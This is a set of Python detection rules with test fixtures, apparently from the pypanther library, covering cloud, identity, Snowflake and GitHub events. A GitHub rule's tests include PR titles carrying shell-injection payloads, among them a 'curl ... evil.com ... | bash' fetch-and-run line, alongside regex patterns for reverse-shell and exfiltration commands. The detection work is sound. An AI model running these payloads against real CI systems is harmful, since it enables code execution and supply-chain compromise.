                            "resource": "core/v1/namespaces/kube-system/pods/gke-metrics-agent",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {"name": "gke-metrics-agent", "namespace": "kube-system"},
                        "spec": {
                            "containers": [
                                {
                                    "image": "gke.gcr.io/gke-metrics-agent:latest",
                                    "imagePullPolicy": "Always",
                                    "name": "gke-metrics-agent",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "10.0.0.1"},
                    "resourceName": "core/v1/namespaces/kube-system/pods/gke-metrics-agent",
                    "response": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {
                                    "image": "gke.gcr.io/gke-metrics-agent:latest",
                                    "imagePullPolicy": "Always",
                                    "name": "gke-metrics-agent",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                            "serviceAccount": "gke-metrics-agent",
                            "serviceAccountName": "gke-metrics-agent",
                            "terminationGracePeriodSeconds": 30,
                        },
                        "status": {},
                    },
                    "serviceName": "k8s.io",
                    "status": {},
                },
                "receiveTimestamp": "2024-02-13 12:45:20.058795785",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 12:45:06.073905000",
            },
        ),
        RuleTest(
            name="Privileged Pod in System Namespace (Excluded)",
            expected_result=False,
            log={
                "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
                "operation": {},
                "protoPayload": {
                    "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                    "authenticationInfo": {"principalEmail": "system:serviceaccount:kube-system:deployment-controller"},
                    "authorizationInfo": [
                        {
                            "granted": True,
                            "permission": "io.k8s.core.v1.pods.create",
                            "resource": "core/v1/namespaces/gke-system/pods/network-agent",
                        },
                    ],
                    "methodName": "io.k8s.core.v1.pods.create",
                    "request": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {"name": "network-agent", "namespace": "gke-system"},
                        "spec": {
                            "containers": [
                                {
                                    "image": "gke.gcr.io/network-agent:latest",
                                    "imagePullPolicy": "Always",
                                    "name": "network-agent",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                        },
                        "status": {},
                    },
                    "requestMetadata": {"callerIP": "10.0.0.2"},
                    "resourceName": "core/v1/namespaces/gke-system/pods/network-agent",
                    "response": {
                        "@type": "core.k8s.io/v1.Pod",
                        "apiVersion": "v1",
                        "kind": "Pod",
                        "metadata": {},
                        "spec": {
                            "containers": [
                                {
                                    "image": "gke.gcr.io/network-agent:latest",
                                    "imagePullPolicy": "Always",
                                    "name": "network-agent",
                                    "resources": {},
                                    "securityContext": {"privileged": True},
                                },
                            ],
                            "securityContext": {},
                            "serviceAccount": "network-agent",
                            "serviceAccountName": "network-agent",
                            "terminationGracePeriodSeconds": 30,
                        },
                        "status": {},
                    },
                    "serviceName": "k8s.io",
                    "status": {},
                },
                "receiveTimestamp": "2024-02-13 12:45:20.058795785",
                "resource": {
                    "labels": {
                        "cluster_name": "some-project-cluster",
                        "location": "us-west1",
                        "project_id": "some-project",
                    },
                    "type": "k8s_cluster",
                },
                "timestamp": "2024-02-13 12:45:06.073905000",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.base import pattern_match_list


@panther_managed
class TeleportCreateUserAccounts(Rule):
    id = "Teleport.CreateUserAccounts-prototype"
    display_name = "Teleport Create User Accounts"
    log_types = [LogType.GRAVITATIONAL_TELEPORT_AUDIT]
    tags = ["SSH", "Persistence:Create Account"]
    reports = {"MITRE ATT&CK": ["TA0003:T1136"]}
    default_severity = Severity.HIGH
    default_description = "A user has been manually created, modified, or deleted"
    dedup_period_minutes = 15
    default_reference = "https://goteleport.com/docs/management/admin/"
    default_runbook = "Analyze why it was manually created and delete it if necessary."
    summary_attributes = [
        "event",
        "code",
        "user",
        "program",
        "path",
        "return_code",
        "login",
        "server_id",
        "sid",
    ]  # user password expiry
    # change passwords for users
    # create, modify, and delete users
    USER_CREATE_PATTERNS = ["chage", "passwd", "user*"]

    def rule(self, event):
        # Filter the events
        if event.get("event") != "session.command":
            return False
        # Check that the program matches our list above
        return pattern_match_list(event.get("program", ""), self.USER_CREATE_PATTERNS)

    def title(self, event):
        return f"User [{event.get('user', '<UNKNOWN_USER>')}] has manually modified system users on [{event.get('cluster_name', '<UNKNOWN_CLUSTER>')}]"

    tests = [
        RuleTest(
            name="Echo command",
            expected_result=False,
            log={
                "argv": [],
                "cgroup_id": 4294967537,
                "code": "T4000I",
                "ei": 15,
                "event": "session.command",
                "login": "root",
                "namespace": "default",
                "path": "/bin/echo",
                "pid": 7143,
                "ppid": 7115,
                "program": "echo",
                "return_code": 0,
                "server_id": "e75992b4-9e27-456f-b1c9-7a32da83c661",
                "sid": "8a3fc038-785b-43f3-8737-827b3e25fe5b",
                "time": "2020-08-17T17:40:37.491Z",
                "uid": "8eaf8f39-09d4-4a42-a22a-65163d2af702",
                "user": "panther",
            },
        ),
        RuleTest(
            name="Userdel command",
            expected_result=True,
            log={
                "argv": ["jacknew"],
                "cgroup_id": 4294967567,
                "code": "T4000I",
                "ei": 105,
                "event": "session.command",
                "login": "root",
                "namespace": "default",
                "path": "/sbin/userdel",
                "pid": 8931,
                "ppid": 8930,
                "program": "userdel",
                "return_code": 0,
                "server_id": "e75992b4-9e27-456f-b1c9-7a32da83c661",
                "sid": "4244c271-8069-4679-a27e-f7c18f88ce45",
                "time": "2020-08-17T18:39:26.192Z",
                "uid": "346d3f61-a010-4871-84de-897f50b18118",
                "user": "panther",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class AWSWAFDisassociation(Rule):
    default_description = "Detection to alert when a WAF disassociates from a source."
    display_name = "AWS WAF Disassociation"
    default_reference = "https://attack.mitre.org/techniques/T1078/"
    default_severity = Severity.CRITICAL
    reports = {"MITRE ATT&CK": ["TA0004:T1498"]}
    log_types = [LogType.AWS_CLOUDTRAIL]
    id = "AWS.WAF.Disassociation-prototype"

    def rule(self, event):
        return event.get("eventName") == "DisassociateWebACL"

    def title(self, event):
        return f"AWS Account ID [{event.get('recipientAccountId')}] disassociated WebACL [{event.deep_get('requestParameters', 'resourceArn')}]"

    def alert_context(self, event):
        return {
            "awsRegion": event.get("awsRegion"),
            "eventName": event.get("eventName"),
            "recipientAccountId": event.get("recipientAccountId"),
            "requestID": event.get("requestID"),
            "actor_user": event.udm("actor_user"),
            "requestParameters": event.deep_get("requestParameters", "resourceArn"),
            "userIdentity": event.deep_get("userIdentity", "principalId"),
        }

    tests = [
        RuleTest(
            name="WAF-Disassociate",
            expected_result=True,
            log={
                "apiVersion": "2019-04-23",
                "awsRegion": "us-west-2",
                "eventCategory": "Management",
                "eventID": "94678efc-2176-462c-b0c9-a612881a39ed",
                "eventName": "DisassociateWebACL",
                "eventSource": "wafv2.amazonaws.com",
                "eventTime": "2022-09-29 23:04:35",
                "eventType": "AwsApiCall",
                "eventVersion": "1.08",
                "managementEvent": True,
                "p_any_aws_account_ids": ["012345678910"],
                "p_any_aws_arns": [
                    "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                    "arn:aws:iam::012345678910:role/DevAdministrator",
                    "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                ],
                "p_any_domain_names": ["AWS Internal"],
                "p_any_trace_ids": ["ASIARLIVEKVNJNSTUSF6"],
                "p_event_time": "2022-09-29 23:04:35",
                "p_log_type": "AWS.CloudTrail",
                "p_parse_time": "2022-09-29 23:08:26.172",
                "p_row_id": "5ad3a83ca88f938cbff8fdd913d1ce1d",
                "p_source_id": "125a8146-e3ea-454b-aed7-9e08e735b670",
                "p_source_label": "Panther Identity Org CloudTrail",
                "readOnly": False,
                "recipientAccountId": "012345678910",
                "requestID": "e4d47992-90f1-47f0-bff7-de18a8277005",
                "requestParameters": {
                    "resourceArn": "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                },
                "sessionCredentialFromConsole": True,
                "sourceIPAddress": "AWS Internal",
                "userAgent": "AWS Internal",
                "userIdentity": {
                    "accessKeyId": "ASIARLIVEKVNJNSTUSF6",
                    "accountId": "012345678910",
                    "arn": "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                    "principalId": "AROARLIVEKVNIRVGDLJWJ:example_user",
                    "sessionContext": {
                        "attributes": {"creationDate": "2022-09-29T22:51:13Z", "mfaAuthenticated": "true"},
                        "sessionIssuer": {
                            "accountId": "012345678910",
                            "arn": "arn:aws:iam::012345678910:role/DevAdministrator",
                            "principalId": "AROARLIVEKVNIRVGDLJWJ",
                            "type": "Role",
                            "userName": "DevAdministrator",
                        },
                        "webIdFederationData": {},
                    },
                    "type": "AssumedRole",
                },
            },
        ),
        RuleTest(
            name="WAF - List WebACLs",
            expected_result=False,
            log={
                "apiVersion": "2019-04-23",
                "awsRegion": "us-west-2",
                "eventCategory": "Management",
                "eventID": "94678efc-2176-462c-b0c9-a612881a39ed",
                "eventName": "ListWebACLs",
                "eventSource": "wafv2.amazonaws.com",
                "eventTime": "2022-09-29 23:04:35",
                "eventType": "AwsApiCall",
                "eventVersion": "1.08",
                "managementEvent": True,
                "p_any_aws_account_ids": ["012345678910"],
                "p_any_aws_arns": [
                    "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                    "arn:aws:iam::012345678910:role/DevAdministrator",
                    "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                ],
                "p_any_domain_names": ["AWS Internal"],
                "p_any_trace_ids": ["ASIARLIVEKVNJNSTUSF6"],
                "p_event_time": "2022-09-29 23:04:35",
                "p_log_type": "AWS.CloudTrail",
                "p_parse_time": "2022-09-29 23:08:26.172",
                "p_row_id": "5ad3a83ca88f938cbff8fdd913d1ce1d",
                "p_source_id": "125a8146-e3ea-454b-aed7-9e08e735b670",
                "p_source_label": "Panther Identity Org CloudTrail",
                "readOnly": False,
                "recipientAccountId": "012345678910",
                "requestID": "e4d47992-90f1-47f0-bff7-de18a8277005",
                "requestParameters": {
                    "resourceArn": "arn:aws:elasticloadbalancing:us-west-2:012345678910:loadbalancer/app/web/84dc5457e450dba5",
                },
                "sessionCredentialFromConsole": True,
                "sourceIPAddress": "AWS Internal",
                "userAgent": "AWS Internal",
                "userIdentity": {
                    "accessKeyId": "ASIARLIVEKVNJNSTUSF6",
                    "accountId": "012345678910",
                    "arn": "arn:aws:sts::012345678910:assumed-role/DevAdministrator/example_user",
                    "principalId": "AROARLIVEKVNIRVGDLJWJ:example_user",
                    "sessionContext": {
                        "attributes": {"creationDate": "2022-09-29T22:51:13Z", "mfaAuthenticated": "true"},
                        "sessionIssuer": {
                            "accountId": "012345678910",
                            "arn": "arn:aws:iam::012345678910:role/DevAdministrator",
                            "principalId": "AROARLIVEKVNIRVGDLJWJ",
                            "type": "Role",
                            "userName": "DevAdministrator",
                        },
                        "webIdFederationData": {},
                    },
                    "type": "AssumedRole",
                },
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers import event_type


@panther_managed
class OktaGlobalMFADisabled(Rule):
    id = "Okta.Global.MFA.Disabled-prototype"
    display_name = "Okta MFA Globally Disabled"
    log_types = [LogType.OKTA_SYSTEM_LOG]
    tags = ["Identity & Access Management", "DataModel", "Okta", "Defense Evasion:Modify Authentication Process"]
    reports = {"MITRE ATT&CK": ["TA0005:T1556"]}
    default_severity = Severity.HIGH
    default_description = "An admin user has disabled the MFA requirement for your Okta account"
    default_reference = (
        "https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/about-authenticators.htm"
    )
    default_runbook = "Contact Admin to ensure this was sanctioned activity"
    dedup_period_minutes = 15
    summary_attributes = ["eventType", "severity", "displayMessage", "p_any_ip_addresses"]

    def rule(self, event):
        return event.udm("event_type") == event_type.ADMIN_MFA_DISABLED

    def title(self, event):
        return f"Okta System-wide MFA Disabled by Admin User {event.udm('actor_user')}"

    def alert_context(self, event):
        context = {"user": event.udm("actor_user"), "ip": event.udm("source_ip"), "event": event.get("eventType")}
        return context

    tests = [
        RuleTest(
            name="MFA Disabled",
            expected_result=True,
            log={
                "published": "2022-03-22 14:21:53.225",
                "eventType": "system.mfa.factor.deactivate",
                "version": "0",
                "severity": "HIGH",
                "actor": {
                    "alternateId": "homer@springfield.gov",
                    "displayName": "Homer Simpson",
                    "id": "111111",
                    "type": "User",
                },
                "client": {
                    "device": "Computer",
                    "ipAddress": "1.1.1.1",
                    "userAgent": {
                        "browser": "CHROME",
                        "os": "Mac OS X",
                        "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36",
                    },
                    "zone": "null",
                },
                "p_log_type": "Okta.SystemLog",
            },
        ),
        RuleTest(
            name="Login Event",
            expected_result=False,
            log={
                "published": "2022-03-22 14:21:53.225",
                "eventType": "user.session.start",
                "version": "0",
                "severity": "INFO",
                "actor": {
                    "alternateId": "homer@springfield.gov",
                    "displayName": "Homer Simpson",
                    "id": "111111",
                    "type": "User",
                },
                "client": {
                    "device": "Computer",
                    "ipAddress": "1.1.1.1",
                    "userAgent": {
                        "browser": "CHROME",
                        "os": "Mac OS X",
                        "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36",
                    },
                    "zone": "null",
                },
                "p_log_type": "Okta.SystemLog",
            },
        ),
    ]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed


@panther_managed
class GSuiteGoogleAccess(Rule):
    id = "GSuite.GoogleAccess-prototype"
    display_name = "Google Accessed a GSuite Resource"
    log_types = [LogType.GSUITE_ACTIVITY_EVENT]
    tags = ["GSuite"]
    default_severity = Severity.LOW
    default_description = (
        "Google accessed one of your GSuite resources directly, most likely in response to a support incident.\n"
    )
    default_reference = "https://support.google.com/a/answer/9230474?hl=en"
    default_runbook = "Your GSuite Super Admin can visit the Access Transparency report in the GSuite Admin Dashboard to see more details about the access.\n"
    summary_attributes = ["actor:email"]

    def rule(self, event):
        if event.deep_get("id", "applicationName") != "access_transparency":
            return False
        return bool(event.get("type") == "GSUITE_RESOURCE")

    tests = [
        RuleTest(
            name="Normal Login Event",
            expected_result=False,
            log={"id": {"applicationName": "login"}, "type": "login"},
        ),
        RuleTest(
            name="Resource Accessed by Google",
            expected_result=True,
            log={"id": {"applicationName": "access_transparency"}, "type": "GSUITE_RESOURCE"},
        ),
    ]



from pypanther.rules.crowdstrike.crowdstrike_base64_encoded_args import (
    CrowdstrikeBase64EncodedArgs as CrowdstrikeBase64EncodedArgs,
)
from pypanther.rules.crowdstrike.crowdstrike_connection_to_embargoed_country import (
    ConnectiontoEmbargoedCountry as ConnectiontoEmbargoedCountry,
)
from pypanther.rules.crowdstrike.crowdstrike_credential_dumping_tool import (
    CrowdstrikeCredentialDumpingTool as CrowdstrikeCredentialDumpingTool,
)
from pypanther.rules.crowdstrike.crowdstrike_cryptomining_tools import (
    CrowdstrikeCryptominingTools as CrowdstrikeCryptominingTools,
)
from pypanther.rules.crowdstrike.crowdstrike_detection_passthrough import (
    CrowdstrikeDetectionpassthrough as CrowdstrikeDetectionpassthrough,
)
from pypanther.rules.crowdstrike.crowdstrike_dns_request import CrowdstrikeDNSRequest as CrowdstrikeDNSRequest
from pypanther.rules.crowdstrike.crowdstrike_lolbas import CrowdstrikeFDRLOLBAS as CrowdstrikeFDRLOLBAS
from pypanther.rules.crowdstrike.crowdstrike_macos_add_trusted_cert import (
    CrowdstrikeMacosAddTrustedCert as CrowdstrikeMacosAddTrustedCert,
)
from pypanther.rules.crowdstrike.crowdstrike_macos_osascript_administrator import (
    CrowdstrikeMacosOsascriptAdministrator as CrowdstrikeMacosOsascriptAdministrator,
)
from pypanther.rules.crowdstrike.crowdstrike_macos_plutil_usage import (
    CrowdstrikeMacosPlutilUsage as CrowdstrikeMacosPlutilUsage,
)
from pypanther.rules.crowdstrike.crowdstrike_real_time_response_session import (
    CrowdstrikeRealTimeResponseSession as CrowdstrikeRealTimeResponseSession,
)
from pypanther.rules.crowdstrike.crowdstrike_remote_access_tool_execution import (
    CrowdstrikeRemoteAccessToolExecution as CrowdstrikeRemoteAccessToolExecution,
)
from pypanther.rules.crowdstrike.crowdstrike_reverse_shell_tool_executed import (
    CrowdstrikeReverseShellToolExecuted as CrowdstrikeReverseShellToolExecuted,
)
from pypanther.rules.crowdstrike.crowdstrike_systemlog_tampering import (
    CrowdstrikeSystemlogTampering as CrowdstrikeSystemlogTampering,
)
from pypanther.rules.crowdstrike.crowdstrike_unusual_parent_child_processes import (
    CrowdstrikeUnusualParentChildProcesses as CrowdstrikeUnusualParentChildProcesses,
)
from pypanther.rules.crowdstrike.crowdstrike_wmi_query_detection import (
    CrowdstrikeWMIQueryDetection as CrowdstrikeWMIQueryDetection,
)



from pypanther.rules.microsoft.microsoft365_brute_force_login_by_user import (
    Microsoft365BruteForceLoginbyUser as Microsoft365BruteForceLoginbyUser,
)
from pypanther.rules.microsoft.microsoft365_external_sharing import (
    Microsoft365ExternalDocumentSharing as Microsoft365ExternalDocumentSharing,
)
from pypanther.rules.microsoft.microsoft365_mfa_disabled import Microsoft365MFADisabled as Microsoft365MFADisabled
from pypanther.rules.microsoft.microsoft_exchange_external_forwarding import (
    Microsoft365ExchangeExternalForwarding as Microsoft365ExchangeExternalForwarding,
)
from pypanther.rules.microsoft.microsoft_graph_passthrough import MicrosoftGraphPassthrough as MicrosoftGraphPassthrough



import re

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.snowflake import query_history_alert_context


@panther_managed
class SnowflakeStreamTempStageCreated(Rule):
    id = "Snowflake.Stream.TempStageCreated-prototype"
    display_name = "Snowflake Temporary Stage Created"
    log_types = [LogType.SNOWFLAKE_QUERY_HISTORY]
    default_severity = Severity.INFO
    create_alert = False
    reports = {"MITRE ATT&CK": ["TA0010:T1041"]}
    default_description = "A temporary stage was created."
    default_reference = (
        "https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion/"
    )
    tags = ["Snowflake", "[MITRE] Exfiltration", "[MITRE] Exfiltration Over C2 Channel"]
    STAGE_EXPR = re.compile(
        "CREATE\\s+(?:OR\\s+REPLACE\\s+)?(?:TEMPORARY\\s+|TEMP\\s+)STAGE\\s+(?:IF\\s+NOT\\s+EXISTS\\s+)?([a-zA-Z0-9_\\.]+)",
        flags=re.I,
    )
    STAGE = ""

    def rule(self, event):
        self.STAGE = self.STAGE_EXPR.match(event.get("QUERY_TEXT", ""))
        return all(
            (event.get("QUERY_TYPE") == "CREATE", event.get("EXECUTION_STATUS") == "SUCCESS", self.STAGE is not None),
        )

    def alert_context(self, event):
        return query_history_alert_context(event) | {"stage": self.STAGE.group(1).lower()}

    tests = [
        RuleTest(
            name="Successful Temp Stage Created",
            expected_result=True,
            log={
                "p_event_time": "2024-10-09 21:06:03.631000000",
                "p_log_type": "Snowflake.QueryHistory",
                "p_source_id": "132d65cd-d6e4-4981-a209-a1d5902afd59",
                "p_source_label": "SF-Ben",
                "EXECUTION_STATUS": "SUCCESS",
                "QUERY_TEXT": "CREATE OR REPLACE TEMP STAGE panther_logs.PUBLIC.data_exfil;",
                "QUERY_TYPE": "CREATE",
                "USER_NAME": "LEX_LUTHOR",
                "WAREHOUSE_NAME": "ADMIN_WH",
            },
        ),
        RuleTest(
            name="Successful Temp Stage Created or Replaced",
            expected_result=True,
            log={
                "p_event_time": "2024-10-09 21:06:03.631000000",
                "p_log_type": "Snowflake.QueryHistory",
                "p_source_id": "132d65cd-d6e4-4981-a209-a1d5902afd59",
                "p_source_label": "SF-Ben",
                "EXECUTION_STATUS": "SUCCESS",
                "QUERY_TEXT": "CREATE OR REPLACE TEMP STAGE my_temp_stage;",
                "QUERY_TYPE": "CREATE",
                "USER_NAME": "LEX_LUTHOR",
                "WAREHOUSE_NAME": "ADMIN_WH",
            },
        ),
        RuleTest(
            name="Unsuccessful Temp Stage Created",
            expected_result=False,
            log={
                "p_event_time": "2024-10-09 21:06:03.631000000",
                "p_log_type": "Snowflake.QueryHistory",
                "p_source_id": "132d65cd-d6e4-4981-a209-a1d5902afd59",
                "p_source_label": "SF-Ben",
                "EXECUTION_STATUS": "FAIL",
                "QUERY_TEXT": "CREATE TEMP STAGE my_temp_stage;",
                "QUERY_TYPE": "CREATE",
                "USER_NAME": "LEX_LUTHOR",
                "WAREHOUSE_NAME": "ADMIN_WH",
            },
        ),
    ]



import re

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.github import (
    github_reference_url,
    github_webhook_alert_context,
    is_cross_fork_pr,
    is_pull_request_event,
)


@panther_managed
class GitHubWebhookMaliciousPRTitles(Rule):
    id = "GitHub.Webhook.MaliciousPRTitles-prototype"
    display_name = "GitHub Malicious Pull Request Titles"
    log_types = [LogType.GITHUB_WEBHOOK]
    reports = {"MITRE ATT&CK": ["TA0001:T1195.002", "TA0002:T1072"]}
    tags = ["Code Injection", "Supply Chain"]
    default_severity = Severity.HIGH
    default_description = "Detects malicious patterns in GitHub pull request titles, descriptions, and commit messages that could indicate bash injection attempts or other malicious activity. This rule is designed to catch attacks like the Nx vulnerability (GHSA-cxm3-wv7p-598c) where PR titles contained bash injection payloads that could be executed by vulnerable CI workflows. Lower severity  for PRs that are not cross-fork.\n"
    default_runbook = "1. Immediately review the pull request content and metadata for malicious patterns 2. Check if the repository has workflows that process PR titles or descriptions unsafely 3. Verify the identity and legitimacy of the PR author, especially for cross-fork PRs 4. Review recent workflow runs for signs of code execution or compromise 5. Check for any unusual repository activity or file modifications 6. Consider temporarily disabling vulnerable workflows until they can be secured 7. Implement input sanitization and use pull_request instead of pull_request_target 8. Report suspected supply chain attacks to security team\n"
    default_reference = "https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c"
    # Bash injection patterns focused on command substitution attacks
    # Based on Nx vulnerability (GHSA-cxm3-wv7p-598c): $(echo "You've been compromised")
    # Command substitution
    # $(command) - requires non-empty command
    # `command` - requires non-empty command
    # Variable expansion with command substitution
    # ${var$(cmd)var}
    # ${var`cmd`var}
    # Process substitution
    # <(command)
    # >(command)
    # Direct shell invocation
    # /bin/bash -c "command"
    # bash -c "command"
    # Encoding/obfuscation attempts
    # Multiple hex bytes (longer sequences)
    # eval($(...)) patterns
    # exec($(...)) patterns
    # Network exfiltration patterns
    # curl url | bash
    # nc IP PORT
    BASH_INJECTION_PATTERNS = [
        "\\$\\([^)]+\\)",
        "`[^`]+`",
        "\\$\\{[^}]*\\$\\([^)]+\\)[^}]*\\}",
        "\\$\\{[^}]*`[^`]+`[^}]*\\}",
        "<\\([^)]+\\)",
        ">\\([^)]+\\)",
        "/bin/(?:sh|bash|dash|zsh)\\s+-c\\s+",
        "(?:bash|sh)\\s+-c\\s+['\\\"]",
        "\\\\x[0-9a-fA-F]{4,}",
        "eval\\s*\\(\\s*\\$",
        "exec\\s*\\(\\s*\\$",
        "(?:curl|wget)\\s+[^|>]+\\|\\s*(?:sh|bash)",
        "nc\\s+[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\s+[0-9]+",
    ]
    COMPILED_BASH_PATTERNS = [re.compile(pattern, re.IGNORECASE | re.MULTILINE) for pattern in BASH_INJECTION_PATTERNS]

    def rule(self, event):
        if not is_pull_request_event(event):
            return False
        if pr_title := event.deep_get("pull_request", "title"):
            return any(pattern.search(pr_title) for pattern in self.COMPILED_BASH_PATTERNS)
        return False

    def _get_matched_patterns(self, text):
        if not text:
            return []
        return [
            {"pattern": pattern.pattern, "match": pattern.findall(text)}
            for pattern in self.COMPILED_BASH_PATTERNS
            if pattern.search(text)
        ]

    def title(self, event):
        pr_number = event.deep_get("pull_request", "number", default="<UNKNOWN>")
        repo_name = event.deep_get("repository", "full_name", default="<UNKNOWN_REPO>")
        action = event.get("action", "<UNKNOWN_ACTION>")
        return f"Malicious pattern detected in PR #{pr_number} in {repo_name} ({action})"

    def alert_context(self, event):
        context = github_webhook_alert_context(event)
        # Analyze patterns found in title
        title_patterns = self._get_matched_patterns(event.deep_get("pull_request", "title"))
        context["title_analysis"] = {
            "contains_malicious_patterns": len(title_patterns) > 0,
            "matched_patterns": title_patterns,
        }
        return context

    def reference(self, event):
        if reference_url := github_reference_url(event):
            return reference_url
        return "DEFAULT"

    def severity(self, event):
        if is_cross_fork_pr(event):
            return "DEFAULT"
        return "LOW"

    tests = [
        RuleTest(
            name="PR with Command Substitution in Title",
            expected_result=True,
            log={
                "action": "opened",
                "number": 123,
                "pull_request": {
                    "id": 789456123,
                    "number": 123,
                    "state": "open",
                    "title": "Fix build issue $(echo 'You have been compromised')",
                    "body": "This PR fixes the build configuration",
                    "draft": False,
                    "user": {"login": "malicious-user", "id": 12345, "type": "User"},
                    "head": {
                        "ref": "fix-build",
                        "sha": "abc123def456",
                        "repo": {"full_name": "malicious-user/forked-repo", "fork": True},
                    },
                    "base": {
                        "ref": "main",
                        "sha": "def456abc123",
                        "repo": {"full_name": "target-org/main-repo", "fork": False},
                    },
                    "html_url": "https://github.com/target-org/main-repo/pull/123",
                    "created_at": "2024-01-15T10:30:00Z",
                },
                "repository": {
                    "name": "main-repo",
                    "full_name": "target-org/main-repo",
                    "private": False,
                    "fork": False,
                },
                "sender": {"login": "malicious-user", "type": "User"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="PR with Backtick Command Substitution",
            expected_result=True,
            log={
                "action": "opened",
                "pull_request": {
                    "number": 456,
                    "title": "Update docs `curl -s evil.com/script | bash`",
                    "body": "Documentation updates",
                    "user": {"login": "attacker"},
                    "head": {"repo": {"full_name": "attacker/repo"}},
                    "base": {"repo": {"full_name": "victim-org/repo"}},
                },
                "repository": {"full_name": "victim-org/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="PR with Shell Invocation",
            expected_result=True,
            log={
                "action": "opened",
                "pull_request": {
                    "number": 505,
                    "title": "Update script /bin/bash -c 'malicious command'",
                    "body": "Script updates",
                },
                "repository": {"full_name": "target/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="Normal PR Title",
            expected_result=False,
            log={
                "action": "opened",
                "pull_request": {
                    "number": 999,
                    "title": "Add new feature for user authentication",
                    "body": "This PR adds OAuth support for user login",
                    "user": {"login": "legitimate-dev"},
                    "head": {"repo": {"full_name": "team/repo"}},
                    "base": {"repo": {"full_name": "team/repo"}},
                },
                "repository": {"full_name": "team/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="Non-PR Event",
            expected_result=False,
            log={
                "action": "push",
                "ref": "refs/heads/main",
                "repository": {"full_name": "org/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="PR Event Missing Pull Request Object",
            expected_result=False,
            log={"action": "opened", "repository": {"full_name": "org/repo"}, "p_log_type": "GitHub.Webhook"},
        ),
        RuleTest(
            name="PR with Hex Encoding Attempt",
            expected_result=True,
            log={
                "action": "opened",
                "pull_request": {"number": 666, "title": "Update \\x2f62696e2f7368", "body": "Binary update"},
                "repository": {"full_name": "target/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
        RuleTest(
            name="PR with Eval Command",
            expected_result=True,
            log={
                "action": "opened",
                "pull_request": {"number": 777, "title": "Config eval($malicious_code)", "body": "Dynamic config"},
                "repository": {"full_name": "target/repo"},
                "p_log_type": "GitHub.Webhook",
            },
        ),
    ]



"""
Used to define global type hints for Panther events and other Panther-specific data types
"""

# Import some types for type hinting
from panther_core import PantherEvent
from panther_core.immutable import ImmutableCaseInsensitiveDict, ImmutableList

__all__ = ["PantherEvent", "ImmutableCaseInsensitiveDict", "ImmutableList"]



from pypanther.rules.tailscale.tailscale_https_disabled import TailscaleHTTPSDisabled as TailscaleHTTPSDisabled
from pypanther.rules.tailscale.tailscale_machine_approval_requirements_disabled import (
    TailscaleMachineApprovalRequirementsDisabled as TailscaleMachineApprovalRequirementsDisabled,
)
from pypanther.rules.tailscale.tailscale_magicdns_disabled import TailscaleMagicDNSDisabled as TailscaleMagicDNSDisabled



from panther_core import PantherEvent

from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.aws import aws_cloudtrail_success, aws_rule_context


@panther_managed
class AWSCloudTrailAttemptToLeaveOrg(Rule):
    id = "AWS.CloudTrail.AttemptToLeaveOrg-prototype"
    display_name = "AWS CloudTrail Attempt To Leave Org"
    log_types = [LogType.AWS_CLOUDTRAIL]
    default_severity = Severity.INFO
    reports = {"MITRE ATT&CK": ["TA0005:T1562.008", "TA0005:T1666"]}
    default_description = "Detects when an actor attempts to remove an AWS account from an Organization. Security configurations are often defined at the organizational level. Leaving the organization can disrupt or totally shut down these controls.\n"
    default_reference = (
        "https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.organizations-leave/\n"
    )
